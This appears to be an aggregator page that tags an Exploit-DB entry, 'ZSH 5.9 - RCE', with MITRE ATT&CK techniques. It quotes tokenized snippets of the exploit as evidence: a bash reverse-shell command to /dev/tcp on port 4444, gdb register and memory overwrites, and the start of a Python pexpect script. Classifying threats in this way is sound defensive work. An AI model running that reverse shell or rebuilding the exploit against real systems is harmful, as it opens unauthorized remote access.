TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Exploit-DB

[local] ZSH 5.9 - RCE

2026-04-09 · Read original ↗

ATT&CK techniques detected

3 predictions
T1059.004Unix Shell
81%
"bash - i > & / dev / tcp / 192. 168. 100. 1 / 4444 0 > & 1 \ \ " " ', b ' set { long } 0x7fffffffd868 = 0x7ffff7cc9110 ', b ' set $ rdi = 0x555555659000 ', b ' set $ rsp = $ rsp - 8 ', b ' continue ', b ' set { long } $ rsp = 0x55555555a000 ', b ' set $ rip = 0x7ffff7cc9110 ', b …"
T1059.004Unix Shell
60%
"[ local ] zsh 5. 9 - rce zsh 5. 9 - rce # exploit zsh 5. 9 - rce # date : 30 - 12 - 2025 # exploit author : sinanadilrana import pexpect import sys import time def debug _ print ( msg ) : print ( f " [ debug ] { msg } " ) def return _ to _ gdb ( gdb, max _ attempts = 3, timeout =…"
T1622Debugger Evasion
43%
"] : # found either pwndbg > or ( gdb ) prompt debug _ print ( " successfully returned to gdb " ) return true except pexpect. eof : debug _ print ( " session ended unexpectedly " ) return false debug _ print ( f " attempt { attempt + 1 } failed, retrying... " ) debug _ print ( " f…"

Summary

ZSH 5.9 - RCE